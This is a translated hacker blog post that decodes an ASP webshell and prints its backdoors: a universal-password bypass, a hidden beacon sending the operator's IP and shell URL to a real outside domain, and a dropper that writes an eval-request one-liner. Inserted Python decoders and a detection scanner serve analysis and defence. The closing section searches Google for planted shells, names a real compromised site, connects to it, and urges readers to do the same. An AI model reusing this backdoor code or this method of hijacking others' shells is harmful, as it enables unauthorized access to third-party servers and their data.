Full decryption and backdoor analysis of Firefox NEW WebShell 8.0

Source: Internet
Author: User
Tags: servervariables

Jindao Ke

I don't remember whether this shell was given to me by a friend. The file's encryption is nothing special, but the way it plants its backdoor is interesting and unusual. Let's take a look at this shell.
There is not much to say about the decryption. The outer layer is the well-known ShiSan encoding, and decoding it is just running the encoding backwards: restore the quote marker to a double quote, then read the text from the end, expanding the line-break marker. No key is involved.

Function ShiSanFun(ShiSanObjstr)
    ' "comment " and "shen" are the shell's two marker strings as this copy of the
    ' page translates them; in the shell itself they are single Chinese characters
    ' standing for a double quote and for a line break respectively.
    ShiSanObjstr = Replace(ShiSanObjstr, "comment ", """")
    For ShiSanI = 1 To Len(ShiSanObjstr)
        If Mid(ShiSanObjstr, ShiSanI, 1) <> "shen" Then
            ' prepending each character reverses the string
            ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
        Else
            ShiSanNewStr = vbCrLf & ShiSanNewStr
        End If
    Next
    ShiSanFun = ShiSanNewStr
End Function



Hacker Wei Encryption

Function UnEncode(temp)
    But = 80
    For I = 1 To Len(temp)
        ' "Lin" stands for the line-break marker character (translated in this copy)
        If Mid(temp, I, 1) <> "Lin" Then
            If Asc(Mid(temp, I, 1)) < 32 Or Asc(Mid(temp, I, 1)) > 126 Then
                ' control bytes and non-ASCII (Chinese text) pass through unchanged
                A = A & Chr(Asc(Mid(temp, I, 1)))
            Else
                ' the subtrahend is cut off in this copy of the page; But (= 80) is
                ' the only constant the function defines, so it is assumed to be the shift
                pk = Asc(Mid(temp, I, 1)) - But
                ' wrap back into the 95-character printable range 32..126
                If pk > 126 Then
                    pk = pk - 95
                ElseIf pk < 32 Then
                    pk = pk + 95
                End If
                A = A & Chr(pk)
            End If
        Else
            A = A & vbCrLf
        End If
    Next
    UnEncode = A
End Function
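The two layers above, re-implemented in Python as an added example (this is not code from the shell or from the article), together with the forward encoding direction so a round trip can be checked. The marker characters and the shift are assumptions: this copy of the page renders the markers as translated words ("comment ", "shen", "Lin") and cuts off the shift constant, so stand-in characters outside printable ASCII are used, and "But = 80" is taken to be the shift. The encoder uses a modulo rather than the shell's two if-branches, which is the same wrap-around written more generally.

```python
# Added example, not code from the shell or from the article: the ShiSan and
# Hacker Wei layers re-implemented, plus the forward (encoding) direction so the
# round trip can be checked. Markers and shift are assumptions (see lead-in).

SHISAN_QUOTE = "\u00a7"  # '§': stand-in for the ShiSan marker that replaces a double quote (assumed)
SHISAN_CRLF = "\u00b6"   # '¶': stand-in for the ShiSan marker that replaces a line break (assumed)
HW_CRLF = "\u2020"       # '†': stand-in for the Hacker Wei line-break marker (assumed)
HW_SHIFT = 80            # "But = 80" is the only constant the page gives; assumed to be the shift


def shisan_decode(text):
    """ShiSan layer: put the double quotes back, then read the text backwards,
    expanding the line-break marker. There is no key: reversal plus substitution."""
    text = text.replace(SHISAN_QUOTE, '"')
    pieces = ["\r\n" if ch == SHISAN_CRLF else ch for ch in text]
    pieces.reverse()
    return "".join(pieces)


def shisan_encode(plain):
    """Inverse of shisan_decode: mark the line breaks, reverse, hide the quotes."""
    marked = plain.replace("\r\n", SHISAN_CRLF)
    return marked[::-1].replace('"', SHISAN_QUOTE)


def hackerwei_decode(text, shift=HW_SHIFT):
    """Hacker Wei layer: printable ASCII (32..126) is shifted back by `shift` and
    wrapped within the 95-character printable range; control bytes and non-ASCII
    text (the Chinese strings in the shell) pass through untouched."""
    out = []
    for ch in text:
        code = ord(ch)
        if ch == HW_CRLF:
            out.append("\r\n")
        elif code < 32 or code > 126:
            out.append(ch)
        else:
            code -= shift
            if code > 126:
                code -= 95
            elif code < 32:
                code += 95
            out.append(chr(code))
    return "".join(out)


def hackerwei_encode(plain, shift=HW_SHIFT):
    """Inverse of hackerwei_decode: shift forward and wrap into 32..126 (modulo 95)."""
    out = []
    for ch in plain.replace("\r\n", HW_CRLF):
        code = ord(ch)
        if code < 32 or code > 126:  # includes the marker, which is outside ASCII
            out.append(ch)
        else:
            out.append(chr(32 + (code - 32 + shift) % 95))
    return "".join(out)


# Constructed sample plaintext for the round trip; not text taken from the real shell.
SAMPLE = 'If Request("x") = "x" Then\r\n    Session("web2a2dmin") = UserPass\r\nEnd If'


def layered_roundtrip(plain):
    """Wrap the text in both layers and peel them off again. Which layer wraps
    which in the real file is not stated on the page; this order is an assumption."""
    wrapped = shisan_encode(hackerwei_encode(plain))
    return hackerwei_decode(shisan_decode(wrapped))


if __name__ == "__main__":
    print(hackerwei_encode(SAMPLE))
    print(shisan_encode(SAMPLE))
    print(layered_roundtrip(SAMPLE) == SAMPLE)
```

Both layers are fixed transforms with no secret, which is why the article can decode the whole shell mechanically; the only thing a decoder needs is the marker characters and the shift, and both are visible in the decoding stub shipped inside the shell.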



After batch decryption of the file, the backdoors can be read. First, the part that sits inside the Hacker Wei layer:

If Request("x") = "x" Then
    Session("web2a2dmin") = UserPass
    URL()
End If

If Session("web2a2dmin") <> UserPass Then
    If Request.Form("Pass") <> "" Then
        If Request.Form("Pass") = UserPass Then
            Session("web2a2dmin") = UserPass
            Response.Redirect URL
        Else
            Response.Write "Verification Failed!"
        End If
    End If   ' the two outer blocks continue past the end of this excerpt
End If


The universal password is obvious: test.asp?x=x. Note that Request("x") without a collection name searches QueryString, Form, Cookies, ClientCertificate and ServerVariables in that order, so the value can be supplied in the query string, a POST field or a cookie; any of them sets the admin session without the real password.


The other backdoor is more interesting. The backdoor address is hidden by URL-encoding it, writing every byte as a %XX hex escape, so a plain search for the domain in the file finds nothing. The code:

Userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If Trim(Userip) = "" Then
    Userip = Request.ServerVariables("REMOTE_ADDR")
End If
Userhttp = Request.ServerVariables("HTTP_REFERER")
UrlAdd = "Http://%77%77%77%2E%31%30%30%61%67%65%2E%63%6E/%73%68%6F%70%78/%4A%76%2E%53%61%70?%6D%73%67="
UrlAdd = UrlAdd & Userip & ":" & Userhttp & "<br>"
GetUrl(UrlAdd)



First the shell decides whether the request came through a proxy: if HTTP_X_FORWARDED_FOR is set it takes that as the operator's address, otherwise it falls back to REMOTE_ADDR; HTTP_REFERER then yields the URL of the shell itself. Bear in mind that X-Forwarded-For is just a request header, so it holds whatever the client or an upstream proxy chose to send; it is not a reliable "real IP".
The percent-encoded UrlAdd is the backdoor address. The author reads it as Http://www.100age.cn/shopvx/JS.asp?Msg=; decoded byte for byte, the hex string as it appears on this page gives Http://www.100age.cn/shopx/Jv.Sap?msg=, so the string was probably mangled when the article was copied. The operator's IP and the shell's address are appended as the msg parameter and handed to GetUrl, which sends them off to the backdoor address for whoever controls it to process.

The GetUrl function is as follows:

Function GetUrl(UrlAdd)
    Set OpenSend = CreateObject("Microsoft.XMLHTTP")
    ' this copy assigns the result of Open to an unused SourceCode variable;
    ' Open returns nothing, so it is written here as a plain statement
    OpenSend.Open "GET", UrlAdd, False
    OpenSend.Send
End Function



The request is made with the server-side XMLHTTP component, the same technique as in the "Sad and Evil" shell, so it leaves from the web server rather than from the operator's browser. Ordinary packet capture on the operator's own machine therefore never sees it; to catch it you have to watch the server's outbound traffic.

So where is the password? This is the other interesting part of the shell. It has a universal password, but the author did not put the second backdoor into this file at all: at login time the shell writes a file named Filemap.asp into the same directory it lives in.

That is a clever idea and a new way of leaving a backdoor. The code:

' "%" and ">" are concatenated separately so the literal cannot close the ASP block
TempString = "<%eval request(""baomi"")%" & ">"
Set Fso = Server.CreateObject("Scripting.FileSystemObject")
Set Fout = Fso.CreateTextFile(Server.MapPath("Filemap.asp"))
Fout.Write TempString
Fout.Close
Set Fout = Nothing
Set Fso = Nothing



So that settles it: because a one-liner backdoor containing <%eval request("baomi")%> is created as soon as someone logs in, anyone who knows the parameter name can connect to it directly, whether or not the shell's own login still works. Here I have changed the password; you still need to protect it.
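Both backdoors described above (the percent-encoded callback address sent through server-side XMLHTTP, and the Filemap.asp one-liner dropped by CreateTextFile) leave recognisable traces in the ASP source. The scanner below is an added example, not code from the article or from the shell, that looks for exactly those traces: it percent-decodes every string literal made of %XX escapes and reports the ones that turn into URLs, flags a server-side HTTP request built from ServerVariables, and pulls the parameter name out of an eval request one-liner. The embedded sample is constructed to mirror the quoted fragments; its hidden address decodes to example.com, not to the real shell's address.

```python
import re
from urllib.parse import unquote

# Constructed sample (not the real shell): it mirrors the two backdoor fragments
# quoted in the article, but the percent-encoded address decodes to example.com.
SAMPLE_ASP = r'''
Userip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If Trim(Userip) = "" Then
    Userip = Request.ServerVariables("REMOTE_ADDR")
End If
Userhttp = Request.ServerVariables("HTTP_REFERER")
UrlAdd = "http://%65%78%61%6D%70%6C%65%2E%63%6F%6D/%6C%6F%67%2E%61%73%70?%6D%73%67="
UrlAdd = UrlAdd & Userip & ":" & Userhttp & "<br>"
GetUrl(UrlAdd)

Function GetUrl(UrlAdd)
    Set OpenSend = CreateObject("Microsoft.XMLHTTP")
    OpenSend.Open "GET", UrlAdd, False
    OpenSend.Send
End Function

TempString = "<%eval request(""baomi"")%" & ">"
Set Fso = Server.CreateObject("Scripting.FileSystemObject")
Set Fout = Fso.CreateTextFile(Server.MapPath("Filemap.asp"))
Fout.Write TempString
Fout.Close
'''

# A VBScript string literal; a doubled quote inside it is an escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# Three or more consecutive %XX escapes: the trick used to hide the callback address.
PCT_RUN = re.compile(r'(?:%[0-9A-Fa-f]{2}){3,}')
ONE_LINER = re.compile(r'eval\s+request\s*\(\s*"+(\w+)"+\s*\)', re.I)
DROPPER = re.compile(r'CreateTextFile\s*\(.*?\.asp', re.I)
XMLHTTP = re.compile(r'Microsoft\.(?:XMLHTTP|ServerXMLHTTP)', re.I)
SERVERVARS = re.compile(
    r'ServerVariables\s*\(\s*"(HTTP_X_FORWARDED_FOR|REMOTE_ADDR|HTTP_REFERER)"', re.I)


def decode_hidden_urls(source):
    """Percent-decode every string literal containing a run of %XX escapes and
    return those that turn out to be URLs."""
    urls = []
    for m in STRING_LITERAL.finditer(source):
        literal = m.group(1)
        if PCT_RUN.search(literal):
            decoded = unquote(literal)
            if re.match(r'https?://', decoded, re.I):
                urls.append(decoded)
    return urls


def scan(source):
    """Return (rule, evidence) pairs for the backdoor patterns the article describes."""
    findings = [("hidden-url", url) for url in decode_hidden_urls(source)]
    if XMLHTTP.search(source) and SERVERVARS.search(source):
        leaked = sorted({m.group(1).upper() for m in SERVERVARS.finditer(source)})
        findings.append(("beacon", "server-side HTTP request built from " + ", ".join(leaked)))
    findings += [("dropper", m.group(0)) for m in DROPPER.finditer(source)]
    findings += [("one-liner", m.group(1)) for m in ONE_LINER.finditer(source)]
    return findings


if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_ASP):
        print(f"{rule:10s} {evidence}")
```

Run against a suspect .asp file read into a string, the "one-liner" finding hands you the parameter name to check for (here baomi), the "dropper" finding tells you which file name to hunt for elsewhere on the server, and the "hidden-url" finding is the address to block at the egress proxy, which is where the beacon has to be caught since it never passes through the operator's browser.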

Now let's test this. I searched Google for Filemap.asp, and it turns up in an images folder:

Http://www.job365.org/Portals/176/zdxingxiang/admin/images/Filemap.asp

Open the tool, enter the password, and connect.
I then Googled "Firefox NEW WebShell".
Testing shows that the URLs highlighted in pink in the screenshot can be connected to. For the first URL the shell itself no longer runs, but its one-liner can be connected to; the second URL connects as well.

A few of them are useful, though not many; I hope nobody touches the data on them.

To sum up: when you come across this shell, first try whether the universal password works, and if it does not, try connecting to the one-liner. It can save a lot of effort.
